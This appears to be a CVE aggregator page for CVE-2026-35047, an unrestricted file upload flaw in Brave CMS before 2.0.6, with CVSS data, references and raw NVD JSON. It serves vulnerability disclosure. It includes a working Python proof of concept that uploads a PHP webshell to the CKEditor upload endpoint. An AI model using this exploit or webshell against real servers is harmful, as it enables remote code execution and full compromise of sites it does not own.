CVE-2026-35047

Description

Brave CMS is an open-source CMS. Prior to 2.0.6, an Unrestricted File Upload vulnerability in the CKEditor endpoint allows attackers to upload arbitrary files, including executable scripts. This may lead to Remote Code Execution (RCE) on the server, potentially resulting in full system compromise, data exfiltration, or service disruption. All users running affected versions of BraveCMS are impacted. This vulnerability is fixed in 2.0.6.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:ajax30:bravecms:*:*:*:*:*:*:*:* - VULNERABLE

BraveCMS < 2.0.6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def exploit(target_url):
    # The vulnerable endpoint might vary, adjust as needed
    upload_url = f"{target_url}/ckeditor/core/connector/php/connector.php?command=QuickUpload&type=Files"
    
    # Payload: A simple PHP webshell
    shell_content = "<?php system($_GET['cmd']); ?>"
    
    files = {
        'upload': ('exploit.php', shell_content, 'application/octet-stream')
    }
    
    try:
        response = requests.post(upload_url, files=files, timeout=10)
        if response.status_code == 200 and "uploaded" in response.text.lower():
            print("[+] Upload likely successful.")
            print(f"[+] Check your shell at: {target_url}/userfiles/exploit.php?cmd=whoami")
        else:
            print("[-] Upload failed or response unexpected.")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    target = "http://vulnerable-site.com"
    exploit(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-35047
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-35047
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-35047/
[4] VulDB https://vuldb.com/cve/CVE-2026-35047
[5] https://github.com/Ajax30/BraveCMS-2.0/commit/058ee4ed7c2b39d540af8274024afcbc9532aa83
[6] https://github.com/Ajax30/BraveCMS-2.0/pull/122
[7] https://github.com/Ajax30/BraveCMS-2.0/security/advisories/GHSA-9rcc-w59j-965v

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-35047", "sourceIdentifier": "[email protected]", "published": "2026-04-06T18:16:42.433", "lastModified": "2026-04-10T18:30:16.167", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Brave CMS is an open-source CMS. Prior to 2.0.6, an Unrestricted File Upload vulnerability in the CKEditor endpoint allows attackers to upload arbitrary files, including executable scripts. This may lead to Remote Code Execution (RCE) on the server, potentially resulting in full system compromise, data exfiltration, or service disruption. All users running affected versions of BraveCMS are impacted. This vulnerability is fixed in 2.0.6."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ajax30:bravecms:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndExcluding": "2.0.6", "matchCriteriaId": "68058898-316C-481E-A190-0E50C51A015D"}]}]}], "references": [{"url": "https://github.com/Ajax30/BraveCMS-2.0/commit/058ee4ed7c2b39d540af8274024afcbc9532aa83", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/Ajax30/BraveCMS-2.0/pull/122", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/Ajax30/BraveCMS-2.0/security/advisories/GHSA-9rcc-w59j-965v", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}